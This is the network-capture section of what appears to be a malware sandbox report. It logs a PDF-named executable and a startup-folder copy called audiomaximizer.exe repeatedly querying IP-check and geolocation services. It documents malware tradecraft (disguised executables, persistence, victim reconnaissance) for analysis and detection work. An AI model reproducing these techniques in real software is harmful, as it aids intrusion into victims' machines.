Jan 13, 2025 12:08:26.773801088 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:26 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49768	132.226.8.169	80	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:27.392987013 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:28.213763952 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:28 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49770	132.226.8.169	80	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:28.963989973 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:30.773112059 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49772	132.226.8.169	80	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:31.669025898 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:32.504878998 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49775	132.226.8.169	80	7556	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\audiomaximizer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 13, 2025 12:08:33.124239922 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 13, 2025 12:08:33.987791061 CET	273	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	104.21.32.1	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:10 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:10 UTC	859	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081279 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjWRVqd%2BUiy1cZPuvD813nyZyKYhwpE1xFnIh5d5Z0mPLCZtNv9y3pJMUj%2BpjGQndQRPbIvvPJoy8V4TbaFABu%2BVB6G4Z888Yyr2SiaXkvlj%2B5go%2FBc4K0o2xhZ188foFcl6Lsi7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed45b9cb72b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1823&min_rtt=1815&rtt_var=697&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1553191&cwnd=217&unsent_bytes=0&cid=1a3bafece83c6929&ts=200&x=0"
2025-01-13 11:08:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49735	104.21.32.1	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:11 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 11:08:11 UTC	863	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081280 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3HOb2h9Mz8Kcm6ozZBOf%2F695M6DTZ%2BXhAT3gQq409EuPGv%2FyJmi1JRWQ5AlJRJKnzxjAYc56GE9FCbWJ83owuT6CdbVIwIpD879qyaswm%2BNvPhp0%2Fu%2BeI2jUnZKgExxP4k6v%2F4xc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed4b7ee641a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1518&min_rtt=1506&rtt_var=589&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1820448&cwnd=241&unsent_bytes=0&cid=15c783ec4d32ae66&ts=136&x=0"
2025-01-13 11:08:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49738	104.21.32.1	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:12 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-13 11:08:12 UTC	860	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081282 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r9THKfabwVsHqX8%2BpOZGM4BXZDOW16LlL7PSVEthjUgTYfm9h%2FdEmiy9ibvvhFO%2F2FPYCaeuCMmRQsi0SvQOma4FYc6XmivfVq6v%2FqhB7gzV12TR9dLPNZQxQt%2BKkzuE9r%2BXjsx0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed54aca34344-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1690&min_rtt=1680&rtt_var=651&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1653454&cwnd=47&unsent_bytes=0&cid=fc13b48f7e5282e8&ts=154&x=0"
2025-01-13 11:08:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	104.21.32.1	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:15 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:15 UTC	855	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081284 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fgkYIOM%2FdqwY9IfqBRVnUSyqOxE31fbbo%2FH9HLgKHk5BZ7KyFyZQRuj8S0HskQjs3Mbc%2F03jtcWwjNUk3TYN1Yyk6S4oeZ92Gmv2OwgqEHOyEC8gEUEy0qUDXYek0zXsTD8o08qx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed641a5d1875-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1597&min_rtt=1589&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1760096&cwnd=153&unsent_bytes=0&cid=06dc5aff1d1e2e1f&ts=158&x=0"
2025-01-13 11:08:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49743	104.21.32.1	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:16 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:16 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081285 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tKJI9P%2BmdJXiuq7%2FzHd9plWebebhaNql4g301mBYUBGqQrx%2BJiM4MKmNTSVZGO8%2FEDx7rtRRxT0tJW5etPltZlPzdanipArjRY0E8IelJXy8zkQ1%2BVuEpnF0B8xEpazymSg%2BQu3B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed6d3c4c72b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1742&min_rtt=1731&rtt_var=672&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1600000&cwnd=217&unsent_bytes=0&cid=c7e95ebbf928a415&ts=161&x=0"
2025-01-13 11:08:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49745	104.21.32.1	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:18 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:18 UTC	857	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:18 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081287 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3ru0rbYUMa%2B3krRZH5sDJVBw0SV3K3rfRxdcj63HevBk2zGh66L4pZ9jAyRT05kr12JiZSO%2FbgZRtZL5cm0LKK2W4t4Js8uzb3lZGB%2BsVNa8TSXaAEJgOyVQ%2F5H37aNR06J4ORmX"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed773af441a6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1556&min_rtt=1548&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1809169&cwnd=241&unsent_bytes=0&cid=9882c92a614ad262&ts=143&x=0"
2025-01-13 11:08:18 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	104.21.32.1	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:19 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:20 UTC	863	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:19 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081289 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2F8G6ZJOme9K3bFTQ0KARhvRFPleZUML6HRoYehqJzqoE%2FhzEu8uXqtUSUWHDgGbZDzivQ0tol9QC6Ffd0s7o%2BwxE11%2FJhtV4UyVVp2eMYYcRDcnw%2FVtx9m6si%2FgWdrmLOwuCu%2FU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed80bdedc327-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1626&min_rtt=1605&rtt_var=617&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1819314&cwnd=189&unsent_bytes=0&cid=7372a27a6a4951fb&ts=166&x=0"
2025-01-13 11:08:20 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	104.21.32.1	443	7088	C:\Users\user\Desktop\PDF-3093900299039 pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-13 11:08:21 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-13 11:08:21 UTC	861	IN	HTTP/1.1 200 OK Date: Mon, 13 Jan 2025 11:08:21 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2081290 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vREf5L8R1bfOcDbtd%2BidaQAmFafzTHBNy5KbFVSKtbrJjGoGbcgb77hT45lvqasgN2hG3KRLLLJWP%2BD5zDlW7Dk1s8K7oBsKAlu%2BiTQawCLfGj1Y%2BQp8b%2FyWq9zphHHW%2FJNNakDi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9014ed89adfe8cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1763&min_rtt=1759&rtt_var=669&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1624026&cwnd=244&unsent_bytes=0&cid=69de9f4147bac988&ts=144&x=0"
